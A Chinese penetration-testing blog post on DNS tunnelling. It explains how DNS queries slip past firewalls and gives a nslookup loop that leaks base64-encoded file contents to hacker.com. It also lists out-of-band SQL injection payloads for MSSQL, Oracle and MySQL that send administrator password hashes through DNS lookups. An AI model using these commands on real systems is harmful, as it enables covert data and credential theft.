10、DNS隧道技术再探

最新推荐文章于 2023-07-31 09:45:00 发布
最新推荐文章于 2023-07-31 09:45:00 发布
阅读量443 收藏 2
点赞数
分类专栏: 【渗透测试高级篇】 # 隧道

DNS基础

大家可以自行搜索关于dns的几种查询方式以及查询流程,因为比较基础,我这里就不贴了。下面贴一个关于dns查询的图,大家自行理解:


DNS隧道技术是如何实现的

一个查询的流程

我们通过下图来理解一下

第一步: 黑客向内部dns服务器发送一个查询hacker.com的请求(这个域名的控制权限是在黑客手里的)

第二步:内部dns服务器通过防火墙向根dns服务器发出查询请求

第三步:经过大量重定向后,DNS请求到达hacker.com的权威DNS服务器,该服务器处于黑客的控制之下

第四步:黑客请求查询的响应结果通过防火墙

第五步:响应结果返回到内部服务器

第六步:内部服务器将响应结果返回给黑客

上面的流程展示了一个黑客在连接外部网络时dns解析的一个过程。由于防火墙并没有对dns协议做任何处理,所以我们可以通过这种方式向外网发送数据来穿透防火墙。

如何向外部dns发送数据

1、将下面内容保存一个文件

cat sensitive.txt Alice
Bob
John

2、 使用如下命令

for i in $(cat sensitive.txt); 
do d=$(echo $i|base64) && nslookup $d.hacker.com; 
done

以上命令的意思是,循环读取文件内容,并且对内容进行base64编码然后用nslookup 将编码后的内容作为主机名向dns发送查询请求。我们可以跟踪dns服务器的解析日志,找出发送出去的内容。

下面是这种方式的问题:

1 、这是一个单向通道,不可以从外部到内部,只能从内部到外部。

2 、这种处理一下小文件是可以的,但是如果有个100M的文件就不那么友好了

这是我们就需要一个工具来完成这个任务了。

推荐工具

一款优秀的工具dnscat2,下载地址:https://github.com/iagox86/dnscat2

dnscat2提供客户端和服务端。

使用的条件:

1 一台vps

2 一个域名控制权限

3 一台内网权限

利用dns回显sql注入

基于以上思路,我们在遇到没有回显的注入时,不能确定命令是否成功,我们可以利用dns,将结果回显到自己的dns服务器上,下面简单说一下不同数据库的利用方式。

MSSQL
有用的存储过程
master..xp_dirtree

功能:递归获取指定目录下的所有目录

命令:master..xp_dirtree '<dirpath>'

master..xp_fileexist

功能:检测指定磁盘下有没有该文件

命令:xp_fileexist '<filepath>'

master..xp_subdirs

功能:获取指定目录下的目录列表

命令:master..xp_subdirs '<dirpath>'

获取sa的hash

执行以上命令即可在远程dns服务器上留下解析日志,获得hash

Oracle
UTL_INADDR.GET_HOST_ADDRESS

函数:UTL_INADDR.GET_HOST_ADDRESS('<host>')

exp:SELECT UTL_INADDR.GET_HOST_ADDRESS('password.hacker.com');

UTL_HTTP.REQUEST

函数:UTL_HTTP.REQUEST('<url>')

exp:SELECT UTL_HTTP.REQUEST('http://password.hacker.com/index.php') FROM DUAL;

HTTPURITYPE.GETCLOB

函数:HTTPURITYPE('<url>').GETCLOB()

exp:SELECT HTTPURITYPE('http://password.hacker.com/index.php').GETCLOB() FROM DUAL;

DBMS_LDAP.INIT

函数:DBMS_LDAP.INIT(('<host>',<port>)

exp:SELECT DBMS_LDAP.INIT(('password.hacker.com',80) FROM DUAL;

举例

SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.hacker.com',80) FROM DUAL;

以上查询语句将管理员的密码解析到我们的dns服务器上

Mysql
LOAD_FILE

函数:LOAD_FILE('<filepath>')

exp:SELECT LOAD_FILE('C:\Windows\system.ini');

举例

SELECT LOAD_FILE(CONCAT('\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.hacker.com\foobar'));

将root用户的hash解析到我们的dns服务器上

PostgreSQL
COPY

函数:COPY <table>(<column>,...) FROM '<path>'

exp:COPY users(names) FROM 'C:\Windows\Temp\users.txt'

举例

由于PostgreSQL不接受子查询,切变量和函数必须进行显视声明。所以利用过程比较麻烦。

总结

本文简单的讲解了DNS隧道技术是如何实现的,以及简单的测试,推荐了工具,然而并没有对工具如何使用进行阐述,这就需要小伙伴们自己去测试了。

Kubernetes 运维工程师必备:K8s 基础面试题精编(二)
jks212454的博客
07-10 469
Kubernetes 运维工程师必备:K8s 基础面试题精编(二)
网络安全设备资产指纹收集:应用指纹的索与实践
最新发布
不忘初心,护天下安全!
11-11 207
设备资产指纹收集是一项网络攻防对抗中至关重要的任务。其中,应用指纹的收集对于准确识别网络中的各类应用程序、评估潜在安全风险以及制定有效的安全策略具有关键意义。本文将深入讨网络安全设备资产指纹收集的关键技术,重点介绍我们团队收集的应用指纹集,并推荐一些相关的开源工具。
DNS隧道技术绕防火墙
零度危险个人博客
04-05 1620
0x01 概念 隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方式。使用隧道传递的数据(或负载)可以是不同协议的数据帧或包。隧道协议将其它协议的数据帧或包重新封装然后通过隧道发送。新的帧头提供路由信息,以便通过互联网传递被封装的负载数据。 0x02 实例分析- DNS隧道技术 环境:客户机(Kali)+DNS服务器(window2003)+目标机(redh
DNS隧道技术解析
Fly_鹏程万里
06-04 5668
DNS基础大家可以自行搜索关于dns的几种查询方式以及查询流程,因为比较基础,我这里就不贴了。下面贴一个关于dns查询的图,大家自行理解:DNS隧道技术是如何实现的一个查询的流程我们通过下图来理解一下第一步: 黑客向内部dns服务器发送一个查询hacker.com的请求(这个域名的控制权限是在黑客手里的)第二步:内部dns服务器通过防火墙向根dns服务器发出查询请求第三步:经过大量重定向后,DNS...
DNS隧道技术
weixin_45007073的博客
05-01 3231
DNS隧道技术安全中的DNS协议dnscat2iodine防御DNS隧道攻击各种隧道技术的优缺点 安全中的DNS协议 DNS的解析原理我们可以参考以下文章 https://blog.youkuaiyun.com/baidu_37964071/article/details/80500825 DNS协议是一种请求/应答协议,也是一种可用于应用层的隧道技术。因为传统的socket隧道已经濒临淘汰及TCP、UDP通信大量被防御系统拦截的状况,DNS、ICMP、HTTP/HTTPS等难以被禁用的协议已成为攻击者控制隧道的主流渠
DNS tunnel的原理及实战
djph26741的博客
06-27 259
DNS tunnel的原理及实战 摘自:http://netsec.ccert.edu.cn/zhengming/2011/11/01/%E8%BD%AC%E8%BD%BD%EF%BC%9Adns-tunnel%E7%9A%84%E5%8E%9F%E7%90%86%E5%8F%8A%E5%AE%9E%E6%88%98/ 什么是DNS tunnel? DNS tunnel 即 D...
内网隐藏通信隧道技术——DNS隧道
qq_44005305的博客
07-31 1477
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
浅谈网络基础架构
热门推荐
森伯416的博客
04-15 1万+
浅谈网络基础架构背景看一次网络请求主要过程1.URL解析2.DNS解析解析顺序服务器层次划分3.建立TCP连接HTTP请求为什么要用TCP协议建立连接?TCP 三次握手4.服务器处理请求5.浏览器接受响应6.渲染页面部署架构总览结构组成相关术语负载均衡(LB/SLB)为什么有LBLB分类二层负载均衡(mac)三层负载均衡(ip)四层负载均衡(tcp)七层负载均衡(http)LVS(四层LB)基础概念LVS集群NGINX(七层LB)四层与七层的区别负载均衡调度器NATFNATTUNDRLB算法统一接入层(AS
软考中级软件设计师知识点总结
qq_46030018的博客
11-07 5652
计算机组成与体系结构 CPU的组成(运算器与控制器) CPU执行指令的过程中,会自动修改PC的内容,PC是**指令计数器**,用来存放将要执行的下一条指令 ​ **对于指令寄存器**((IR)存放即将执行的指令, ​ **指令译码器(ID)**对指令中的操作码字段进行分析和解释, ​ **地址寄存器(AR)**,不是我们常用的CPU内部部件,其作用是用来保存当前CPU所要访问的内存单元或I/O设备的地址。 层次化存储体系 BIOS** (Basic Input Output System)(
CCIE重认证350-401
stqer的博客
01-04 2917
traffic policing: causes TCP retransmissions when traffic is dropped导致TCP重传时流量下降 introduces no delay and jitter引入无延迟和抖动 drops excessive traffic减少过多的流量 traffic shaping: buffers excessive traffic缓冲过多的流量 introduces delay and jitter引入延迟和抖动 applied on traffic t
基于HTTP流量和DNS隧道技术进行检测
12-07
根据专家经验,总结出了恶意HTTP流量中各种不一致、字段异常、回传系统信息等情况以及部分木门和后门对应的DNS传输的特征。PPT多达70多页,内容详尽,值得学习。
4、DNS隧道
Fly_鹏程万里
06-08 1728
0x00 前言前两天和朋友说到代理,随之讨论了一下关于隧道技术,之前也发过一篇关于DNS隧道技术的文章,不过感觉没有写好,今天就重写一下关于隧道技术的总结;首先这篇文章是以前写的,也发在乌云过,最近为博客更新一些隧道技术的东西,所以先把这篇老文章拿出来,后面会更新一些新的东西,也欢迎大家提出新的思路;0x01 概念隧道技术(Tunneling)是一种通过使用互联网络的基础设施在网络之间传递数据的方...
内网渗透系列:内网隧道之DNS隧道
闵行小鱼塘
07-07 4999
最近开始研究隧道相关,如前做了个整理——内网渗透系列:内网穿透(隧道)学习,本篇专门来学习DNS隧道
DNS隧道特征
Ds的博客
04-01 819
传统基于UDP DNS Tunnel特征 1、DNS攻击建模 密集请求型:例如随机子域名DDoS、反射型DDoS。其特征为QPS高、时序特征强,一般能够可视化观察到波峰。 漏洞攻击型:例如针对DNS server的已知漏洞攻击。其特征为数量少、受DNS type影响,适合分类统计。如果批量PoC的话,则特征同1。 数据传输型:例如DNS Tunnel、Malware DGA、PoC中的DNS回显、SSRF重绑定等。其特征在于域名文本特征明显、适用于规则匹配。 将DNS日志的Request和Respons
DNS隧道
03-31 5321
简介 本片文章主要介绍如何使用DNS隧道对内网进行穿透,搭建隧道,使得外网机器可以直接访问内网主机,DNS隧道也是比较常见的搭建隧道的方式。 DNS基础 DNS简介 DNS协议主要就是用来在你访问主机域名的时候查询对应的IP地址并返回给你的协议,计算机是根据IP地址和MAC地址来进行通信的。通过DNS可以将域名(方便记忆)自动转换成IP地址来进行通信,这就是DNS的作用。 查询域名对应的IP地址只是DNS可以查询的记录的一种,常见的可查询记录类型如下 类型 内容 A 域名的IPv4 记录
内网渗透之DNS隧道搭建
蚁景网安学院
08-26 1098
原创稿件征集 邮箱:edu@antvsion.com QQ:3200599554 黑客与极客相关,互联网安全领域里的热点话题漏洞、技术相关的调查或分析,稿件通过并发布还能收获200-800元不等的稿酬。 本文作者:D1m0n 前言 年初有幸参加了一次hvv,我主要负责内网渗透的部分,包括代理搭建,横向移动等等。那个时候,也是刚刚接触内网没两个月,赶鸭子上架的学了一下就上了战场。好在运气不错,通过weblogic的反序列化RCE拿到系统权限,后来发现了一个尴尬的问题,目标主机不出网,借助搜索引擎,大佬们都.
HTTP流量与DNS隧道安全检测技术分析
该资源是一份详尽的70多页的PPT,主要讨了基于HTTP流量和DNS隧道技术的网络安全检测方法,重点关注恶意流量的演变趋势、HTTP可疑流量的检测以及DNS隧道的识别。内容涵盖了僵木蠕虫流量的变化、HTTP流量中的异常...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值